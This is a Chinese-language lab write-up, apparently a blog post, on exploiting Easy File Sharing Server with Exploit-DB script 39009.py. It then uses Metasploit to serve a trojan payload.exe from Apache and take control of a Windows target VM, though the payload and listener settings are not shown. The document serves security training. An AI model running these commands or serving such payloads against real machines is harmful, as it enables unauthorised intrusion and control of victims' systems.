一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server,该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。
一、打开easy file sharing server
二、kali上nmap扫描端口
发现80和443端口提供该服务
扫描漏洞
运行脚本
python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机ip 80
之后靶机会启动计算器,easy file sharing server 关闭,漏洞复现成功。
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
一、生成被控端
生成一个木马文件
启动apache服务,使得靶机能够下载木马文件
service apache2 start
将木马文件上传到服务器上
cp payload.exe /var/www/html/payload.exe
之后靶机要下载该文件
浏览器输入攻击机ip/payload.exe
打开msfconsole
设置参数
之后只要靶机打开了木马文件,就可以控制靶机了
如图就已经控制成功了
我们可以查看靶机的文件
如果不再控制靶机,输入
如果不再要控制靶机,输入
exit -y
即可退出控制
标签:Metasploit,sharing,file,server,漏洞,easy,靶机 From: https://www.cnblogs.com/cs0513/p/17928419.html